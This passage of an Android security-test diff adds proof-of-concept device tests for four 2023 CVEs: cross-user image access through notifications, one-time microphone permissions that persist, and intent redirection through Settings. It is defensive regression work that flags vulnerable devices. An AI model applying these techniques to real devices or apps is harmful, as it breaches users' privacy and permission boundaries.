+import android.content.pm.UserInfo;
+import android.graphics.Bitmap;
+import android.graphics.Canvas;
+import android.graphics.Color;
+import android.graphics.drawable.Icon;
+import android.net.Uri;
+import android.os.UserHandle;
+import android.os.UserManager;
+import android.provider.MediaStore;
+import android.service.notification.StatusBarNotification;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    Instrumentation mInstrumentation;
+
+    private AutoCloseable withAdoptShellPermissionIdentity(String permission) {
+        UiAutomation uiAutomation = mInstrumentation.getUiAutomation();
+        uiAutomation.adoptShellPermissionIdentity(permission);
+
+        // Remove permissions
+        return () -> uiAutomation.dropShellPermissionIdentity();
+    }
+
+    @Test
+    public void testCallStyleNotification() {
+        try {
+            mInstrumentation = getInstrumentation();
+            Context context = mInstrumentation.getContext();
+            int testUserId = -1;
+
+            // Retrieve created user Id
+            try (AutoCloseable withAdoptShellPermissionIdentity =
+                    withAdoptShellPermissionIdentity(android.Manifest.permission.CREATE_USERS)) {
+                final List<UserInfo> list =
+                        context.getSystemService(UserManager.class).getUsers(true);
+                for (UserInfo info : list) {
+                    if (info.toString().contains("cve_2023_21239_user" /* testUser name */)) {
+                        testUserId = info.getUserHandle().getIdentifier();
+                        break;
+                    }
+                }
+            }
+            assumeTrue(testUserId != -1);
+
+            // Create a pending intent for notification
+            Intent intent = new Intent();
+            PendingIntent pendingIntent =
+                    PendingIntent.getActivity(
+                            context, 0 /* request code */, intent, PendingIntent.FLAG_MUTABLE);
+
+            // Retrieve contentUri with userId
+            Uri contentUriWithUser =
+                    ContentProvider.createContentUriForUser(
+                            MediaStore.Images.Media.EXTERNAL_CONTENT_URI,
+                            UserHandle.of(testUserId));
+
+            // Create personIcon using URI to access the media from cve_2023_21239_User
+            Icon personIcon = Icon.createWithContentUri(contentUriWithUser);
+
+            // Create person
+            Person person =
+                    new Person.Builder()
+                            .setName("cve_2023_21239_person" /* person name */)
+                            .setIcon(personIcon)
+                            .setImportant(true /* high priority */)
+                            .build();
+
+            // Create style so that the notification created is callStyle
+            Notification.CallStyle style =
+                    Notification.CallStyle.forOngoingCall(person, pendingIntent);
+
+            // Create smallIcon for notification
+            Bitmap testBitmap =
+                    Bitmap.createBitmap(30 /* width */, 30 /* height */, Bitmap.Config.ARGB_8888);
+            final Canvas canvas = new Canvas(testBitmap);
+            canvas.drawColor(Color.BLUE);
+            Icon notificationIcon = Icon.createWithBitmap(testBitmap);
+
+            // Set notification channel id
+            String notificationChannelId = "notification_channel_id";
+
+            // Create notification
+            Notification callNotification =
+                    new Notification.Builder(context, notificationChannelId)
+                            .setStyle(style)
+                            .setCategory(Notification.CATEGORY_CALL)
+                            .setSmallIcon(notificationIcon)
+                            .setContentIntent(pendingIntent)
+                            .setFullScreenIntent(pendingIntent, true /* high priority */)
+                            .build();
+
+            // Create a notification channel
+            NotificationChannel notificationChannel =
+                    new NotificationChannel(
+                            notificationChannelId,
+                            "cve_2023_21239_notification_channel" /* notification channel name */,
+                            NotificationManager.IMPORTANCE_HIGH);
+
+            // Post the notification
+            NotificationManager notificationManager =
+                    context.getSystemService(NotificationManager.class);
+            notificationManager.createNotificationChannel(notificationChannel);
+
+            // Check if any security exception is caught
+            int notificationId = 0;
+            try {
+                notificationManager.notify(notificationId, callNotification);
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(MediaStore.Images.Media.EXTERNAL_CONTENT_URI.toString())) {
+                    // Ignore exception thrown with fix and exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Check if notification gets posted or not, fail the test if notification gets posted
+            assertFalse(
+                    "Device is vulnerable to b/274592467 hence images belonging to another user on"
+                        + " the same device can be displayed in CallStyle notifications",
+                    poll(
+                            () -> {
+                                StatusBarNotification[] activeNotifications =
+                                        notificationManager.getActiveNotifications();
+                                for (StatusBarNotification notification : activeNotifications) {
+                                    if (notification.getId() == notificationId
+                                            && notification
+                                                    .getPackageName()
+                                                    .equals(context.getPackageName())) {
+                                        return true;
+                                    }
+                                }
+                                return false;
+                            }));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
new file mode 100644
index 0000000..10d9d77
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/Android.bp
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21244",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.core",
+        "androidx.test.rules",
+        "compatibility-device-util-axt",
+        "sts-device-util",
+    ],
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
new file mode 100644
index 0000000..b30febc
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21244">
+    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21244" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
new file mode 100644
index 0000000..774aa78
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21244/src/android/security/cts/CVE_2023_21244/DeviceTest.java
@@ -0,0 +1,170 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21244;
+
+import static android.app.NotificationManager.IMPORTANCE_DEFAULT;
+import static android.provider.MediaStore.Images.Media.EXTERNAL_CONTENT_URI;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.Notification;
+import android.app.NotificationChannel;
+import android.app.NotificationManager;
+import android.app.RemoteInputHistoryItem;
+import android.content.ContentProvider;
+import android.content.Context;
+import android.content.pm.UserInfo;
+import android.graphics.drawable.Icon;
+import android.os.UserManager;
+import android.service.notification.StatusBarNotification;
+import android.util.Log;
+
+import androidx.test.runner.AndroidJUnit4;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.io.IOException;
+import java.util.List;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private static final String TAG = "CVE-2023-21244";
+
+    @Test
+    public void testCVE_2023_21244() {
+        try {
+            // Get the user id of "cve_2023_21244_user" created in testPocCVE_2023_21244()
+            Instrumentation instrumentation = getInstrumentation();
+            Context context = instrumentation.getContext();
+            int testUserId =
+                    SystemUtil.runWithShellPermissionIdentity(
+                            () -> {
+                                UserManager userManager =
+                                        context.getSystemService(UserManager.class);
+                                List<UserInfo> users = userManager.getUsers();
+                                int userId = -1;
+                                for (UserInfo user : users) {
+                                    if (user.name.equals("cve_2023_21244_user")) {
+                                        userId = user.id;
+                                        break;
+                                    }
+                                }
+                                return userId;
+                            },
+                            android.Manifest.permission.CREATE_USERS);
+            assumeTrue("Unable to find the user cve_2023_21244_user", testUserId != -1);
+
+            // Insert a placeholder content in the new user and query it to see if it has been
+            // inserted successfully
+            final String imagesContentUri = EXTERNAL_CONTENT_URI.toString();
+            assumeTrue(
+                    "Failed to insert a placeholder content in the test user",
+                    poll(
+                            () -> {
+                                try {
+                                    SystemUtil.runShellCommand(
+                                            instrumentation,
+                                            String.format(
+                                                    "content insert --user %d --uri %s --bind "
+                                                            + "_display_name:s:cve_2023_21244.jpg",
+                                                    testUserId, imagesContentUri));
+                                    return SystemUtil.runShellCommand(
+                                                    instrumentation,
+                                                    String.format(
+                                                            "content query " + "--user %d --uri %s",
+                                                            testUserId, imagesContentUri))
+                                            .contains("Row");
+                                } catch (IOException e) {
+                                    Log.i(TAG, "Got an exception: " + e);
+                                }
+                                return false;
+                            }));
+
+            // Prepare the notification builder with the remote input history containing the
+            // secondary user's image
+            final String channelId = "CVE_2023_20913_channel";
+            Notification.Builder builder =
+                    new Notification.Builder(context, channelId)
+                            .setChannelId(channelId)
+                            .setSmallIcon(
+                                    Icon.createWithData(
+                                            new byte[0] /* data */,
+                                            0 /* offset */,
+                                            0 /* length */));
+            RemoteInputHistoryItem remoteInputHistoryItems[] = {
+                new RemoteInputHistoryItem(
+                        "image/*" /* mime type */,
+                        ContentProvider.maybeAddUserId(EXTERNAL_CONTENT_URI, testUserId),
+                        "cve_2023_21244_text" /* backup text */)
+            };
+            builder.setRemoteInputHistory(remoteInputHistoryItems);
+
+            // Send the notification
+            final int notificationId = 1;
+            NotificationManager nmgr = context.getSystemService(NotificationManager.class);
+            nmgr.createNotificationChannel(
+                    new NotificationChannel(channelId, channelId, IMPORTANCE_DEFAULT));
+            try {
+                nmgr.notify(notificationId, builder.build());
+            } catch (SecurityException securityException) {
+                if (securityException
+                        .getLocalizedMessage()
+                        .toLowerCase()
+                        .contains(imagesContentUri)) {
+                    // Ignore as this is expected with fix and the test should pass so exit the test
+                    return;
+                } else {
+                    throw securityException;
+                }
+            }
+
+            // Check if notification gets posted or not. On a vulnerable device, the notification
+            // containing other users' image will get posted, hence fail the test else the test will
+            // pass.
+            assertFalse(
+                    "Device is vulnerable to b/276729064 hence images belonging to another user on"
+                            + " the same device can be displayed in notification by setting it as"
+                            + " a part of remote input history",
+                    poll(
+                            () -> {
+                                StatusBarNotification[] activeNotifications =
+                                        nmgr.getActiveNotifications();
+                                for (StatusBarNotification notification : activeNotifications) {
+                                    if (notification.getId() == notificationId
+                                            && notification
+                                                    .getPackageName()
+                                                    .equals(context.getPackageName())) {
+                                        return true;
+                                    }
+                                }
+                                return false;
+                            }));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
new file mode 100644
index 0000000..e8ef246
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/Android.bp
@@ -0,0 +1,52 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21254-helper",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "helper-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    manifest: "helper-app/AndroidManifest.xml",
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21254-test",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "test-app/src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "androidx.test.uiautomator_uiautomator",
+        "compatibility-device-util-axt",
+        "sts-device-util",
+    ],
+    manifest: "test-app/AndroidManifest.xml",
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
new file mode 100644
index 0000000..8bbf9e8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/AndroidManifest.xml
@@ -0,0 +1,25 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21254_helper">
+    <uses-permission android:name="android.permission.RECORD_AUDIO" />
+    <application>
+        <activity android:name=".PocActivity"
+            android:exported="true" />
+    </application>
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
new file mode 100644
index 0000000..3d3b2f7
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/helper-app/src/android/security/cts/CVE_2023_21254_helper/PocActivity.java
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_helper;
+
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+
+import android.app.Activity;
+import android.content.pm.PackageManager;
+
+public class PocActivity extends Activity {
+    private static final int REQUEST_CODE = 1;
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+        if (checkSelfPermission(RECORD_AUDIO) != PackageManager.PERMISSION_GRANTED) {
+            requestPermissions(new String[] {RECORD_AUDIO}, REQUEST_CODE);
+        }
+    }
+
+    @Override
+    public void onRequestPermissionsResult(int requestCode, String[] permissions, int[] results) {
+        super.onRequestPermissionsResult(requestCode, permissions, results);
+        if (requestCode == REQUEST_CODE
+                && permissions[0].equals(RECORD_AUDIO)
+                && results[0] == PackageManager.PERMISSION_GRANTED) {
+            // Terminate app process if one-time permission is granted
+            System.exit(REASON_USER_REQUESTED);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
new file mode 100644
index 0000000..d9d2502
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/AndroidManifest.xml
@@ -0,0 +1,23 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21254_test">
+    <instrumentation
+        android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21254_test" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
new file mode 100644
index 0000000..c5db133
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21254/test-app/src/android/security/cts/CVE_2023_21254_test/DeviceTest.java
@@ -0,0 +1,154 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21254_test;
+
+import static android.Manifest.permission.DUMP;
+import static android.Manifest.permission.RECORD_AUDIO;
+import static android.app.ApplicationExitInfo.REASON_USER_REQUESTED;
+import static android.content.pm.PackageManager.PERMISSION_DENIED;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static com.android.compatibility.common.util.SystemUtil.runWithShellPermissionIdentity;
+import static com.android.sts.common.SystemUtil.poll;
+
+import static org.junit.Assert.assertTrue;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import static java.lang.String.format;
+
+import android.app.ActivityManager;
+import android.app.ApplicationExitInfo;
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.BySelector;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.util.List;
+import java.util.function.BooleanSupplier;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+    @Test
+    public void testPocCVE_2023_21254() {
+        try {
+            final Instrumentation instrumentation = getInstrumentation();
+            final Context context = instrumentation.getContext();
+            final UiAutomation uiAutomation = instrumentation.getUiAutomation();
+            final String helperAppPkg = "android.security.cts.CVE_2023_21254_helper";
+
+            // Revoke RECORD_AUDIO permission for helperAppPkg
+            uiAutomation.revokeRuntimePermission(helperAppPkg, RECORD_AUDIO, context.getUser());
+
+            // Wait until RECORD_AUDIO permission is revoked for helperAppPkg
+            BooleanSupplier permissionCheck =
+                    new BooleanSupplier() {
+                        @Override
+                        public boolean getAsBoolean() {
+                            PackageManager pm = context.getPackageManager();
+                            return pm.checkPermission(RECORD_AUDIO, helperAppPkg)
+                                    == PERMISSION_DENIED;
+                        }
+                    };
+            assumeTrue(
+                    format(
+                            "%s permission is not revoked for %s package hence skipping",
+                            RECORD_AUDIO, helperAppPkg),
+                    poll(permissionCheck));
+
+            // Start targetActivity from helper app which will request for one-time permission
+            final String targetActivity = "android.security.cts.CVE_2023_21254_helper.PocActivity";
+            Intent intent =
+                    new Intent()
+                            .setClassName(helperAppPkg, targetActivity)
+                            .setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+            context.startActivity(intent);
+
+            // Grant one-time permission to helperAppPkg. This has dependence on UI since permission
+            // required to grant one-time permission MANAGE_ONE_TIME_PERMISSION_SESSIONS cannot be
+            // granted to test-app or used via adoptShellPermissionIdentity
+            final UiDevice uiDevice = UiDevice.getInstance(instrumentation);
+            final long uiTimeoutMs = 2_000L;
+            BySelector selector =
+                    By.res(createCaseInsensitivePattern(".*permission_allow_one_time_button.*"))
+                            .pkg(createCaseInsensitivePattern(".*permissioncontroller.*"));
+            assumeTrue(
+                    "UI element for allowing one-time permission not found",
+                    uiDevice.wait(Until.hasObject(selector), uiTimeoutMs));
+            uiDevice.findObject(selector).click();
+            // If in case GrantPermissionsActivity is launched twice due to race condition, click UI
+            // element again to grant one-time permission
+            if (!uiDevice.wait(Until.gone(selector), uiTimeoutMs)) {
+                uiDevice.findObject(selector).click();
+            }
+
+            // Wait until helperAppPkg app process is terminated
+            runWithShellPermissionIdentity(
+                    () -> {
+                        assumeTrue(
+                                format(
+                                        "%s app process not terminated and hence skipping",
+                                        helperAppPkg),
+                                poll(
+                                        () -> {
+                                            // Pass pid and maxNum as 0 to
+                                            // getHistoricalProcessExitReasons() in
+                                            // order to get all matching records for helperAppPkg.
+                                            final List<ApplicationExitInfo> infos =
+                                                    context.getSystemService(ActivityManager.class)
+                                                            .getHistoricalProcessExitReasons(
+                                                                    helperAppPkg,
+                                                                    0 /* pid */,
+                                                                    0 /* maxNum */);
+                                            for (ApplicationExitInfo info : infos) {
+                                                if (info.getStatus() == REASON_USER_REQUESTED) {
+                                                    return true;
+                                                }
+                                            }
+                                            return false;
+                                        }));
+                    },
+                    DUMP);
+
+            // Without fix, one-time permission for helperAppPkg is not revoked after app process
+            // terminates and hence test fails
+            assertTrue(
+                    "Device is vulnerable to b/254736794!! One-time permissions can be held"
+                            + " indefinitely due to activity manager bug",
+                    poll(permissionCheck));
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    private Pattern createCaseInsensitivePattern(String pattern) {
+        return Pattern.compile(pattern, Pattern.CASE_INSENSITIVE);
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
new file mode 100644
index 0000000..1f7e5c2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/Android.bp
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+package {
+    default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+    name: "CVE-2023-21256",
+    defaults: [
+        "cts_support_defaults",
+    ],
+    srcs: [
+        "src/**/*.java",
+    ],
+    test_suites: [
+        "sts",
+    ],
+    static_libs: [
+        "Nene",
+        "androidx.test.core",
+        "androidx.test.rules",
+        "androidx.test.uiautomator_uiautomator",
+    ],
+    platform_apis: true,
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
new file mode 100644
index 0000000..b6cdbca
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/AndroidManifest.xml
@@ -0,0 +1,22 @@
+<!--
+  Copyright 2023 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+    package="android.security.cts.CVE_2023_21256">
+
+    <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+        android:targetPackage="android.security.cts.CVE_2023_21256" />
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
new file mode 100644
index 0000000..31d153f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2023-21256/src/android/security/cts/CVE_2023_21256/DeviceTest.java
@@ -0,0 +1,134 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2023_21256;
+
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+
+import static org.junit.Assert.assertFalse;
+import static org.junit.Assume.assumeNoException;
+import static org.junit.Assume.assumeTrue;
+
+import android.app.Instrumentation;
+import android.app.UiAutomation;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
+import android.os.UserHandle;
+import android.provider.Settings;
+
+import androidx.test.runner.AndroidJUnit4;
+import androidx.test.uiautomator.By;
+import androidx.test.uiautomator.UiDevice;
+import androidx.test.uiautomator.Until;
+
+import com.android.bedstead.nene.utils.Poll;
+import com.android.internal.app.PlatLogoActivity;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import java.time.Duration;
+import java.util.regex.Pattern;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+    private UiDevice mUiDevice;
+
+    @Test
+    public void testSettingsHomePageActivityFromWorkProfile() {
+        UiAutomation uiAutomation = null;
+        try {
+            final long timeoutMs = 10_000L;
+            Instrumentation instrumentation = getInstrumentation();
+            uiAutomation = instrumentation.getUiAutomation();
+            mUiDevice = UiDevice.getInstance(instrumentation);
+            Context context = instrumentation.getContext();
+            String defaultSettingsPkg = "com.android.settings";
+            String platLogoActivityName = PlatLogoActivity.class.getName();
+            String dumpsysActivityCmd = "dumpsys activity " + platLogoActivityName;
+
+            // Retrieve Settings app's package name
+            uiAutomation.adoptShellPermissionIdentity(
+                    android.Manifest.permission.INTERACT_ACROSS_USERS);
+            ResolveInfo info =
+                    context.getPackageManager()
+                            .resolveActivityAsUser(
+                                    new Intent(Settings.ACTION_SETTINGS),
+                                    PackageManager.MATCH_SYSTEM_ONLY,
+                                    UserHandle.USER_SYSTEM);
+            if (info != null && info.activityInfo != null) {
+                defaultSettingsPkg = info.activityInfo.packageName;
+            }
+
+            // Attempt to launch PlatLogoActivity using Settings app
+            Intent intent =
+                    Intent.createChooser(
+                            new Intent(Settings.ACTION_SETTINGS_EMBED_DEEP_LINK_ACTIVITY)
+                                    .setClassName(
+                                            defaultSettingsPkg,
+                                            defaultSettingsPkg
+                                                    + ".homepage.SettingsHomepageActivity")
+                                    .putExtra(
+                                            Settings.EXTRA_SETTINGS_EMBEDDED_DEEP_LINK_INTENT_URI,
+                                            new Intent(Intent.ACTION_CHOOSER)
+                                                    .toUri(Intent.URI_INTENT_SCHEME))
+                                    .putExtra(
+                                            Intent.EXTRA_INTENT,
+                                            new Intent()
+                                                    .setClassName("android", platLogoActivityName))
+                                    .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK),
+                            "chooserTitle");
+            context.startActivity(intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // Click Settings from ChooserActivity
+            String settingsText = "Settings";
+            assumeTrue(mUiDevice.wait(Until.hasObject(By.text(settingsText)), timeoutMs));
+            mUiDevice.findObject(By.text(settingsText)).click();
+
+            Pattern resumedTruePattern =
+                    Pattern.compile(".*mResumed=true.*", Pattern.CASE_INSENSITIVE);
+
+            // Wait for dumpsys result to update
+            Poll.forValue(
